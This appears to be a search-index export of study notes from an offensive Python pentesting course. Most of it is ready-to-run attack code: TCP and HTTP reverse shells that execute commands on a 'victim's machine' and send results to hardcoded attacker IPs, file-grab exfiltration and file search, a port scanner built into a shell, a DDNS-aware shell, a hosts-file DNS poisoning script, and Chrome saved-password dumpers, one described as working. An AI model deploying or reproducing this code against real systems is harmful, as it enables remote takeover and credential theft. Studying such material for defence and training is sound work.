                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting","reverse shell","port scanner"]},{"location":"python/coding-a-reverse-shell-that-scans-ports/#client-side","title":"Client side","text":"

                                  To be run on the victim's machine.

                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nimport os\nimport socket\nimport subprocess\n\ndef transfer(s, path):\n    if os.path.exists(path):\n        f = open(path, 'rb')\n        packet = f.read(1024)\n        while packet:\n            s.send(packet)\n            packet = f.read(1024)\n        s.send('DONE'.encode())\n        f.close()\n\ndef scanner(s, ip, ports):\n    scan_result = '' # scan_result is a variable stores our scanning result\n    for port in ports.split(','):\n        try: # we will try to make a connection using socket library for EACH one of these ports\n            sock =  socket.socket()\n#connect_ex This function returns 0 if the operation succeeded,  and in our case operation succeeded means that the connection happens whihch means the port is open otherwsie the port could be closed or the host is unreachable in the first place.\n            output = sock.connect_ex((ip, int(port)))\n            if output == 0:\n                scan_result = scan_result + \"[+] Port \" + port + \" is opened\" + \"\\n\"\n            else:\n                scan_result = scan_result + \"[-] Port \" + port + \" is closed\"\n                sock.close()\n        except Exception as e:\n            pass\n    s.send(scan_result.encode())\ndef connect():\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect(('192.168.0.152', 8080))\n    while True:\n        command = s.recv(1024)\n        if 'terminate' in command.decode():\n            s.close()\n            break\n        elif 'grab' in command.decode():\n            grab, path = command.decode().split('*')\n            try:\n                transfer(s, path)\n            except:\n                s.send(str(e).encode())\n                pass\n\n        elif 'scan' in command.decode(): # syntax: scan 10.10.10.100:22,80\n            command = command[5:].decode() #slice the leading first 5 char \n            ip, ports = command.split(':')\n            scanner(s, ip, ports)\n        else:\n            CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n            s.send(CMD.stdout.read())\n            s.send(CMD.stderr.read())\n\ndef main():\n    connect()\n\nmain()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","port scanner"]},{"location":"python/coding-a-reverse-shell-that-searches-files/","title":"Coding a reverse shell that searches files","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-reverse-shell-that-searches-files/#client-side","title":"Client side","text":"

                                  To be run in the victim's machine.

                                  import requests\nimport os\nimport subprocess\nimport time\n\nwhile True:\n    req = requests.get('http://192.168.0.152:8080')\n    command = req.text\n    if 'terminate' in command:\n        break\n    elif 'grab' in command:\n        grab, path = command.split(\"*\")\n        if os.path.exists(path):\n            url = \"http://192.168.0.152:8080/store\"\n            filer = {'file': open(path, 'rb')}\n            r = requests.post(url, files=filer)\n        else:\n            post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode())\n    elif 'search' in command: #The Formula is search <path>*.<file extension>  -->for example let's say that we got search C:\\\\*.pdf\n        command = command[7:] #cut off the the first 7 character ,, output would be  C:\\\\*.pdf\n        path, ext = command.split('*')\n        lists = '' # here we define a string where we will append our result on it\n\n#os.walk is a function that will naviagate ALL the directoies specified in the provided path and returns three values:-\n#1-dirpath is a string contains the path to the directory\n#2-dirnames is a list of the names of the subdirectories in  dirpath\n#3-files is a list of the files name in dirpath\n\n#Once we got the files list, we check each file (using for loop), if the file extension was matching what we are looking for, then we add the directory path into list string.\n\n\n\n        for dirpath, dirname, files in os.walk(path):\n           for file in files:\n               if file.endswith(ext):\n                   lists = lists + '\\n' + os.path.join(dirpath, file)\n        requests.post(url='http://192.168.0.152:8080', data=lists)\n    else:\n        CMD = subprocess.Popen(command, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read())\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read())\n    time.sleep(3)\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/","title":"Coding a TCP connection and a reverse shell","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#basic-connection","title":"Basic connection","text":"

                                  From eJPT study module + the book Networking computers.

                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#client-side","title":"Client side","text":"

                                  To be run on victim's computer.

                                  from socket import *\nserverName = \"servername or ip\"\nserverPort = 12000\n\nclientSocket = socket(AF_INET, SOCK_STREAM)\nclientSocket.connect((serverName, serverPort))\n\nsentence = str(input(\"Enter a sentence in lower case: \"))\nclientSocket.send(sentence.encode())\nmodifiedSentence = clientSocket.recv(1024)\n\nprint(\"From server: \", modifiedSentence.decode())\nclientSocket.close()\n

                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#server-side","title":"Server side","text":"
                                  from socket import *\n\nserverPort = 12000\nserverSocket = socket(AF_INET, SOCK_STREAM)\n\nserverSocket.bind(('', serverPort))\nserverSocket.listen(1)\nprint(\"Server is ready to receive...\")\n\nwhile True:\n    connectionSocket, addr = serverSocket.accept()\n    sentence = connectionSocket.recv(1024).decode()\n    capitalizedsentence = sentence.upper()\n    connectionSocket.send(capitalizedsentence.encode())\n    connectionSocket.close()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#reverse-tcp-connection","title":"Reverse TCP connection","text":"

                                  From the course: Python For Offensive PenTest: A Complete Practical

                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#client-side_1","title":"Client side","text":"

                                  To be run on victim's computer.

                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport socket    # For Building TCP Connection\nimport subprocess # To start the shell in the system\n\ndef connect():\n    s = socket.socket()\n    s.connect(('10.0.2.6', 1234)) # Here we define the Attacker IP and the listening port\n\n    while True:\n        command = s.recv(1024) # keep receiving commands from the Kali machine, read the first KB of the tcp socket\n\n        if 'terminate' in command.decode(): # if we got terminate order from the attacker, close the socket and break the loop\n            s.close()\n            break\n        else:   # otherwise, we pass the received command to a shell process\n\n            CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n            s.send(CMD.stdout.read()) # send back the result\n            s.send(CMD.stderr.read()) # send back the error -if any-, such as syntax error\n\ndef main():\n    connect()\nmain()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#server-side_1","title":"Server side","text":"

                                  To be run on attacker's computer.

                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport socket\n\ndef connect():\n\n    s = socket.socket()\n    s.bind((\"10.0.2.15\", 1234))\n    s.listen(1) # define the backlog size for the Queue, I made it 1 as we are expecting a single connection from a single\n    conn, addr = s.accept() # accept() function will retuen the connection object ID (conn) and will return the client(target) IP address and source port in a tuple format (IP,port)\n    print ('[+] We got a connection from', addr)\n\n    while True:\n\n        command = input(\"Shell> \")\n\n        if 'terminate' in command: # If we got terminate command, inform the client and close the connect and break the loop\n            conn.send('terminate'.encode())\n            conn.close()\n            break\n        elif '' in command: # If the user just click enter, we will send a whoami command\n            conn.send('whoami'.encode()) \n            print( conn.recv(1024).decode()) \n        else:\n            conn.send(command.encode()) # Otherwise we will send the command to the target\n            print( conn.recv(1024).decode()) # print the result that we got back\n\ndef main():\n    connect()\nmain()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#using-pyinstaller","title":"Using pyinstaller","text":"

                                  See pyinstaller.

                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-an-http-reverse-shell/","title":"Coding an http reverse shell","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-an-http-reverse-shell/#client-side","title":"Client side","text":"

                                  To be run on victim's computer.

                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nimport requests\nimport subprocess\nimport time\n\nwhile True:\n\n    req = requests.get('http://192.168.0.152:8080') # Send GET request to our kali server\n    command = req.text # Store the received txt into command variable\n\n    if 'terminate' in command:\n        break\n\n    else:\n        CMD = subprocess.Popen(command, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read()) # POST the result\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read()) # or the error -if any-\n\n    time.sleep(3)\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-an-http-reverse-shell/#server-side","title":"Server side","text":"

                                  To be run on attacker's computer.

                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nimport http.server\n\nHOST_NAME = \"192.168.0.152\" // our attacker machine\nPORT_NUMBER = 8080 // attacker listening port\n\nclass MyHandler(http.server.BaseHTTPRequestHandler): # MyHandler defines what we should do when we receive a GET/POST\n\n    def do_GET(self):\n\n        command = input(\"Shell> \")\n        self.send_response(200)\n        self.send_header(\"Content-type\", \"text/html\")\n        self.end_headers()\n        self.wfile.write(command.encode())\n\n    def do_POST(self):\n\n        self.send_response(200)\n        self.end_headers()\n        length = int(self.headers['Content-length']) #Define the length which means how many bytes the HTTP POST data contains, the length value has to be integer\n        postVar = self.rfile.read(length)\n        print(postVar.decode())\n\nif __name__ == \"__main__\":\n\n    # We start a server_class and create httpd object and pass our kali IP,port number and class handler(MyHandler)\n    server_class = http.server.HTTPServer\n    httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)\n    try:\n        httpd.serve_forever() # start the HTTP server, however if we got ctrl+c we will Interrupt and stop the server\n    except KeyboardInterrupt:\n        print('[!] Server is terminated')\n        httpd.server_close()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/ddns-aware-shell/","title":"Coding a DDNS aware shell","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.

                                  When coding a reverse shell you don't need to hardcode the IP address of the attacker machine. Instead, you can use a Dynamic DNS server such as https://www.noip.com/. To inform this server of our attacker IP public address we will install a linux dynamic client on our kali (an agent that will do the trick).

                                  See noip to lear how to install a linux dynamic client on the attacker machine.

                                  After installing the agent, let's see the modification needed on the client side of the TCP reverse shell.

                                  ","tags":["python","python pentesting","scripting","ddns","reverse shell"]},{"location":"python/ddns-aware-shell/#client-side","title":"Client side","text":"
                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport socket\nimport subprocess\nimport os\n\ndef transfer(s, path):\n    if os.path.exists(path):\n        f = open(path, 'rb')\n        packet = f.read(1024)\n        while len(packet) > 0:\n            s.send(packet)\n            packet = f.read(1024)\n        s.send('DONE'.encode())\n    else:\n        s.send('File not found'.encode())\ndef connecting(ip):\n    s = socket.socket()\n    s.connect((ip, 8080))\n\n    while True:\n        command = s.recv(1024)\n\n        if 'terminate' in command.decode():\n            s.close()\n            break\n\n        elif 'grab' in command.decode():\n            grab, path = command.decode().split(\"*\")\n            try:\n                transfer(s, path)\n            except:\n                pass\n        else:\n            CMD = subprocess.Popen(command.decode(), shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n            s.send(CMD.stderr.read())\n            s.send(CMD.stdout.read())\ndef main():\n    ip = socket.gethostbyname('cared.ddns.net')\n    print (ip)\n    return\n    connecting(ip)\nmain()\n
                                  ","tags":["python","python pentesting","scripting","ddns","reverse shell"]},{"location":"python/dns-poisoning/","title":"DNS poisoning","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.

                                  1. Add a new line to hosts file in windows with attacker IP and an url

                                  echo 10.10.120.12 google.com >> c:\\Windows\\System32\\drivers\\etc\n

                                  2. Flush the DNS cache to make sure that we will use the updated record

                                  ipconfig /flushdns\n

                                  Now traffic will be redirected to the attacker machine.

                                  ","tags":["python","python pentesting","techniques","DNS poisoning"]},{"location":"python/dns-poisoning/#python-script-for-dns-poisoning","title":"Python script for DNS poisoning","text":"
                                  import subprocess\nimport os\n\nos.chdir(\"C:\\Windows\\System32\\drivers\\etc\")\n\ncommand = \"echo 10.10.10.100 www.google.com >> hosts\"\n\nCMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n\ncommand = \"ipconfig /flushdns\"\n\nCMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n
                                  ","tags":["python","python pentesting","techniques","DNS poisoning"]},{"location":"python/dumping-chrome-saved-passwords/","title":"Dumping saved passwords from Google Chrome","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/dumping-chrome-saved-passwords/#how-does-chrome-saved-passwords-work","title":"How does Chrome saved passwords work?","text":"

                                  Chrome uses windows session password to encrypt and decrypt saved passwords. Encrypted passwords are stored in a SQlite db called 'Login Data DB' located at:

                                  C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\n

                                  Chrome calls to the windows API function called \"CryptProtectData\", which uses the windows login password as an encryption key and in reverse operation a windows API function called \"CryptUnprotectData\" to decrypt the password value back to clear text.

                                  1. Install sqlite from: https://sqlitebrowser.org/dl/

                                  2. Open DB Browser sqlite.

                                  3. In your windows explorer, go to the path where sqlite db is stored and copy the file \"Login Data\" to your Desktop.

                                  4. Change the extension of \"Login Data\" file to .sqlite3

                                  5. Open \"Login Data.sqlite3\" in DB Browser sqlite.

                                  6. Go to tab \"Browse Data\" (Hoja de Datos in spanish) and select the table login. There you have all stored passwords.

                                  ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/dumping-chrome-saved-passwords/#our-script","title":"Our script","text":"

                                  The route map for this script will be:

                                  1. Guessing the path to sqlite database: username and browser used by the victim.

                                  C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\n

                                  2. Sending the password value from a column in \"logins\" table, in \"Login Data.sqlite3\" to function CryptUn ProtectData.

                                  3. Send the passwords through a reverse shell.

                                  ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/dumping-chrome-saved-passwords/#script-for-gathering-passwords","title":"Script for gathering passwords","text":"

                                  Here is the script provided in the course (it doesn't work, below I've pasted a different one that works):

                                  # Python For Offensive PenTest: A Complete Practical Course  - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nfrom os import getenv \n# To find out the Chrome SQL path- C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\n\nimport sqlite3 # To read the Chrome SQLite DB\n\nimport win32crypt  # High level library to call windows API CryptUnprotectData\n\nfrom shutil import copyfile # To make a copy of the Chrome SQLite DB\n\n\n# LOCALAPPDATA is a Windows Environment Variable which points to >>> C:\\Users\\{username}\\AppData\\Local\npath = getenv(\"LOCALAPPDATA\")+r\"\\Google\\Chrome\\User Data\\Default\\Login Data\"\n\n# make a copy the Login Data DB and pull data out of the copied DB, so there are no conflicts in case that the user is using the original (maybe she is logged into facebook, let's say)\npath2 = getenv(\"LOCALAPPDATA\")+r\"\\Google\\Chrome\\User Data\\Default\\Login2\"\ncopyfile(path, path2)\n\n# Connect to the copied Database\nconn = sqlite3.connect(path2)\n\n\ncursor = conn.cursor() #Create a Cursor object and call its execute() method to perform SQL commands like SELECT\n\n# SELECT column_name,column_name FROM table_name\n# SELECT action_url and username_value and password_value FROM table logins\ncursor.execute('SELECT action_url, username_value, password_value FROM logins')\n\n\n# To retrieve data after executing a SELECT statement, we call fetchall() to get a list of the matching rows.\nfor raw in cursor.fetchall():\n\n    print(raw[0] + '\\n' + raw[1]) # print the action_url (raw[0]) and print the username_value (raw[1])\n\n    password = win32crypt.CryptUnprotectData(raw[2])[1] # pass the encrypted Password to CryptUnprotectData API function to decrypt it  \n\n    print(password)\nconn.close()\n

                                  Script that works. These are requirements:

                                  pip install PyCryptodome\n

                                  Script:

                                  import os\nimport json\nimport base64\nimport sqlite3\nimport win32crypt\nfrom Crypto.Cipher import AES\nimport shutil\n\ndef get_master_key():\n    with open(os.environ['USERPROFILE'] + os.sep + r'AppData\\Local\\Google\\Chrome\\User Data\\Local State', \"r\") as f:\n        local_state = f.read()\n        local_state = json.loads(local_state)\n    master_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n    master_key = master_key[5:]  # removing DPAPI\n    master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]\n    return master_key\n\ndef decrypt_payload(cipher, payload):\n    return cipher.decrypt(payload)\n\ndef generate_cipher(aes_key, iv):\n    return AES.new(aes_key, AES.MODE_GCM, iv)\n\ndef decrypt_password(buff, master_key):\n    try:\n        iv = buff[3:15]\n        payload = buff[15:]\n        cipher = generate_cipher(master_key, iv)\n        decrypted_pass = decrypt_payload(cipher, payload)\n        decrypted_pass = decrypted_pass[:-16].decode()  # remove suffix bytes\n        return decrypted_pass\n    except Exception as e:\n        # print(\"Probably saved password from Chrome version older than v80\\n\")\n        # print(str(e))\n        return \"Chrome < 80\"\n\n\nmaster_key = get_master_key()\nlogin_db = os.environ['USERPROFILE'] + os.sep + r'AppData\\Local\\Google\\Chrome\\User Data\\default\\Login Data'\nshutil.copy2(login_db, \"Loginvault.db\") #making a temp copy since Login Data DB is locked while Chrome is running\nconn = sqlite3.connect(\"Loginvault.db\")\ncursor = conn.cursor()\ntry:\n    cursor.execute(\"SELECT action_url, username_value, password_value FROM logins\")\n    for r in cursor.fetchall():\n        url = r[0]\n        username = r[1]\n        encrypted_password = r[2]\n        decrypted_password = decrypt_password(encrypted_password, master_key)\n        if len(username) > 0:\n            print(\"URL: \" + url + \"\\nUser Name: \" + username + \"\\nPassword: \" + decrypted_password + \"\\n\" + \"*\" * 50 + \"\\n\")\nexcept Exception as e:\n    pass\ncursor.close()\nconn.close()\ntry:\n    os.remove(\"Loginvault.db\")\nexcept Exception as e:\n    pass\n
                                  ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/dumping-chrome-saved-passwords/#script-with-gathering-passwords-phase-integrated-in-a-reverse-shell","title":"Script with gathering passwords phase integrated in a reverse shell","text":"
                                  # Python For Offensive PenTest: A Complete Practical Course  - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nimport json\nimport base64\nfrom os import getenv \n# To find out the Chrome SQL path- C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\n\nimport sqlite3 # To read the Chrome SQLite DB\nfrom Crypto.Cipher import AES\nimport win32crypt  # High level library to call windows API CryptUnprotectData\n\nfrom shutil import copyfile # To make a copy of the Chrome SQLite DB\n\n\n# LOCALAPPDATA is a Windows Environment Variable which points to >>> C:\\Users\\{username}\\AppData\\Local\npath = getenv(\"LOCALAPPDATA\")+r\"\\Google\\Chrome\\User Data\\Default\\Login Data\"\n\n# make a copy the Login Data DB and pull data out of the copied DB\npath2 = getenv(\"LOCALAPPDATA\")+r\"\\Google\\Chrome\\User Data\\Default\\Login2\"\ncopyfile(path, path2)\n\n# Connect to the copied Database\nconn = sqlite3.connect(path2)\n\n\ncursor = conn.cursor() #Create a Cursor object and call its execute() method to perform SQL commands like SELECT\n\n# SELECT column_name,column_name FROM table_name\n# SELECT action_url and username_value and password_value FROM table logins\ncursor.execute('SELECT action_url, username_value, password_value FROM logins')\n\n\n# To retrieve data after executing a SELECT statement, we call fetchall() to get a list of the matching rows.\nfor raw in cursor.fetchall():\n\n    print(raw[0] + '\\n' + raw[1]) # print the action_url (raw[0]) and print the username_value (raw[1])\n\n    password = win32crypt.CryptUnprotectData(raw[2])[1] # pass the encrypted Password to CryptUnprotectData API function to decrypt it  \n\n    print(password)\nconn.close()\n
                                  ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/","title":"Hickjack the Internet Explorer process to bypass an host-based firewall","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.

                                  For our script to bypass a host-based firewall (based on an ACL), we will hickjack the Internet Explorer process to conceal our traffick and bypass it.

